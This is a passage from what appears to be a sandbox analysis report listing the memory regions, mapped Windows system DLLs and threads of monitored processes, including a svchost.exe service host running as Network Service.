0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 593 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 594 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 595 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 596 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 597 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 598 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 599 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 600 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 601 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 602 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 603 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 604 start_va = 0x7feff850000 end_va 
= 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 605 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 606 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 607 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 608 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 609 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 610 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 611 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 612 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 613 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 614 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" 
Region: id = 615 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 616 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 35 os_tid = 0x9f8 Thread: id = 36 os_tid = 0x9f4 Thread: id = 37 os_tid = 0x9f0 Thread: id = 38 os_tid = 0x9ec Thread: id = 39 os_tid = 0x9e4 Thread: id = 40 os_tid = 0x9fc Thread: id = 62 os_tid = 0x91c Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8da9000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xf0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e915" [0xc000000f], "LOCAL" [0x7] Region: id = 622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 623 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 624 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" 
filename = "" Region: id = 625 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 626 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 627 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 628 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 629 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 630 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 631 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 632 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 633 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 634 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 635 start_va = 0x1b0000 end_va = 0x1c9fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 636 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 637 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" 
filename = "" Region: id = 638 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 639 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 640 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 641 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 642 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 643 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 644 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 645 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 646 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 647 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 648 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 649 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 650 start_va = 0x490000 end_va = 0x491fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 651 start_va = 0x4a0000 end_va = 0x4affff 
entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 652 start_va = 0x4b0000 end_va = 0x4b4fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 653 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 654 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 655 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 656 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 657 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 658 start_va = 0x810000 end_va = 0x8cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 659 start_va = 0x8d0000 end_va = 0xcc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 660 start_va = 0xcd0000 end_va = 0xd8ffff entry_point = 0xcd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 661 start_va = 0xd90000 end_va = 0xd90fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 662 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0xda0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: 
id = 663 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0xdb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 664 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0xdc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 665 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0xdd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 666 start_va = 0xde0000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 667 start_va = 0xe60000 end_va = 0xe6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 668 start_va = 0xe70000 end_va = 0xe7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 669 start_va = 0xe80000 end_va = 0xe8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 670 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 671 start_va = 0xea0000 end_va = 0xeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 672 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 673 start_va 
= 0xec0000 end_va = 0xecffff entry_point = 0xec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 674 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 675 start_va = 0xee0000 end_va = 0xeeffff entry_point = 0xee0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 676 start_va = 0xef0000 end_va = 0xefffff entry_point = 0xef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 677 start_va = 0xf00000 end_va = 0xf0ffff entry_point = 0xf00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 678 start_va = 0xf10000 end_va = 0xf1ffff entry_point = 0xf10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 679 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0xf20000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 680 start_va = 0xf30000 end_va = 0x11fefff entry_point = 0xf30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 681 start_va = 0x1200000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 682 start_va = 0x1280000 end_va = 0x128ffff entry_point = 0x1280000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 683 start_va = 0x1290000 end_va = 0x129ffff entry_point = 0x1290000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 684 start_va = 0x12a0000 end_va = 0x12affff entry_point = 0x12a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 685 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x12b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 686 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x1310000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 687 start_va = 0x1320000 end_va = 0x132ffff entry_point = 0x1320000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 688 start_va = 0x1330000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 689 start_va = 0x1340000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 690 start_va = 0x1350000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 691 start_va = 0x1360000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 692 start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 693 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 694 start_va = 0x1400000 end_va = 0x1400fff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 695 start_va = 0x1410000 end_va = 0x1410fff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 696 start_va = 0x1420000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 697 start_va = 0x1450000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 698 start_va = 0x14e0000 end_va = 
0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 699 start_va = 0x1560000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 700 start_va = 0x15f0000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 701 start_va = 0x1680000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 702 start_va = 0x1760000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 703 start_va = 0x18c0000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 704 start_va = 0x1a40000 end_va = 0x1abffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 705 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 706 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 707 start_va = 0x1c10000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 708 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 709 start_va = 0x1cb0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 710 start_va = 0x1dd0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 711 start_va = 0x1e90000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" 
filename = "" Region: id = 712 start_va = 0x1f90000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 713 start_va = 0x20d0000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 714 start_va = 0x21b0000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 715 start_va = 0x2270000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 716 start_va = 0x2340000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 717 start_va = 0x23c0000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 718 start_va = 0x24f0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 719 start_va = 0x2500000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 720 start_va = 0x2600000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 721 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 722 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 723 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 724 start_va = 0x77a30000 end_va = 0x77a36fff entry_point = 0x77a30000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 725 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 726 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 727 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 728 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 729 start_va = 0x7fef4880000 end_va = 0x7fef4af9fff entry_point = 0x7fef4880000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 730 start_va = 0x7fef6d60000 end_va = 0x7fef6d67fff entry_point = 0x7fef6d60000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 731 start_va = 0x7fef7940000 end_va = 0x7fef7950fff entry_point = 0x7fef7940000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 732 start_va = 0x7fef7d00000 end_va = 0x7fef7d63fff entry_point = 0x7fef7d00000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 733 start_va = 0x7fef7d70000 end_va = 0x7fef7de0fff entry_point = 0x7fef7d70000 region_type = mapped_file 
name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 734 start_va = 0x7fef7df0000 end_va = 0x7fef7e27fff entry_point = 0x7fef7df0000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 735 start_va = 0x7fef7e30000 end_va = 0x7fef7e7dfff entry_point = 0x7fef7e30000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 736 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 737 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 738 start_va = 0x7fef80c0000 end_va = 0x7fef80effff entry_point = 0x7fef80c0000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 739 start_va = 0x7fef81c0000 end_va = 0x7fef81dffff entry_point = 0x7fef81c0000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 740 start_va = 0x7fefaef0000 end_va = 0x7fefaf07fff entry_point = 0x7fefaef0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 741 start_va = 0x7fefaf10000 end_va = 0x7fefaf20fff entry_point = 0x7fefaf10000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: 
"c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 742 start_va = 0x7fefafd0000 end_va = 0x7fefafd6fff entry_point = 0x7fefafd0000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 743 start_va = 0x7fefafe0000 end_va = 0x7fefb032fff entry_point = 0x7fefafe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 744 start_va = 0x7fefb040000 end_va = 0x7fefb06ffff entry_point = 0x7fefb040000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 745 start_va = 0x7fefb130000 end_va = 0x7fefb13afff entry_point = 0x7fefb130000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 746 start_va = 0x7fefb140000 end_va = 0x7fefb166fff 